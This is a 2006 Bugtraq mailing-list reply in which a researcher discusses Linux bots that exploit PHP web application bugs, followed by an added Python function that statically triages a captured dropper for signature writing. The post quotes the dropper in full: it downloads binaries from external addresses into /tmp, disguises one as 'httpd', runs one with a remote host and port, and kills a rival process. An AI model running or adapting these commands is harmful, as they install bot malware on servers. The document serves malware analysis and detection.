Bugtraq mailing list archives
Re: new linux malware
From: "Jamie Riden" <jamie.riden () gmail com>
Date: Thu, 23 Feb 2006 09:00:13 +1300
On 21/02/06, Gadi Evron <ge () linuxbox org> wrote:
Indeed, it has become an annoying trend everybody talks about but nobody writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either vulnerabilities in known applications such as WordPress, PHPBB, Drupal, etc. or actually trying different permutations to attack the site.
<snip>
Anyone else seeing their web server logs going crazy with new patterns every day? Email me, I am starting a sharing system where these can be shared mutually so we can better protect ourselves, create signatures, etc.
I got as far as looking at mwcollect and nepenthes to see if anyone had written plugins to slurp these bots, but couldn't find anything. Typically they're some sort of variant on:

    #!/bin/bash
    cd /tmp
    wget xxx.yy.105.36/ping
    mv ping cb
    chmod +x cb
    ./cb xxx.yyy.233.251 8080 &
    killall -9 lordnikonz
    wget xxxx052101/images/logo.jpg
    mv logo.jpg httpd
    rm -rf scripz
    chmod +x httpd
    export PATH="."
    httpd

with payloads being variously identified as Kaiten, Linux.RST and Lupii by Symantec AV. This is just stuff trying the old awstats exploit, I haven't coded up any handlers for the xml-rpc, or other exploits.

So - any handlers/plugins for these? And if so, is anyone (respectable :) collecting the malware?

cheers,
Jamie
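A static triage of the dropper quoted in the message above, as an added example that is not part of the original post: it walks the script without running it, follows the renames, and tags the behaviours a signature could key on. The tag names and the DAEMONS and SCRATCH lists are assumptions made for this illustration.

```python
import shlex
# Dropper as quoted in the post above (addresses are already masked there).
SAMPLE = """#!/bin/bash
cd /tmp
wget xxx.yy.105.36/ping
mv ping cb
chmod +x cb
./cb xxx.yyy.233.251 8080 &
killall -9 lordnikonz
wget xxxx052101/images/logo.jpg
mv logo.jpg httpd
rm -rf scripz
chmod +x httpd
export PATH="."
httpd
"""
DAEMONS = {"httpd", "sshd", "crond", "syslogd"}   # assumed masquerade names
SCRATCH = {"/tmp", "/var/tmp", "/dev/shm"}        # assumed world-writable dirs

def triage(script):
    """Tag the behaviours of a captured shell dropper; nothing is executed."""
    tags, sources, runs, fetched, exe = [], [], [], set(), set()
    for line in map(str.strip, script.splitlines()):
        argv = shlex.split(line.rstrip("&"), comments=True)
        if not argv:
            continue
        cmd, args, name = argv[0], argv[1:], argv[0].rsplit("/", 1)[-1]
        if cmd == "cd" and args and args[0] in SCRATCH:
            tags.append("stages-in-world-writable-dir")
        elif cmd in ("wget", "curl"):
            urls = [a for a in args if not a.startswith("-")]
            sources.extend(urls)
            fetched.update(u.rsplit("/", 1)[-1] for u in urls)
            tags.append("remote-fetch")
        elif cmd == "mv" and len(args) == 2 and args[0] in fetched:
            fetched.add(args[1])              # follow the rename
            if args[1] in DAEMONS:
                tags.append("masquerades-as-daemon")
        elif cmd == "chmod" and "+x" in args:
            exe.update(args)
        elif cmd == "killall":
            tags.append("kills-other-process")
        elif line.startswith("export PATH=") and "." in args[0][5:].split(":"):
            tags.append("path-includes-cwd")
        elif name in fetched and name in exe:
            runs.append((name, args))         # args may be a remote host and port
            tags.append("executes-downloaded-file")
    return {"tags": list(dict.fromkeys(tags)), "sources": sources, "runs": runs}
```

Calling `triage(SAMPLE)` returns the ordered behaviour tags, the two download sources, and the two executions of fetched files with their arguments.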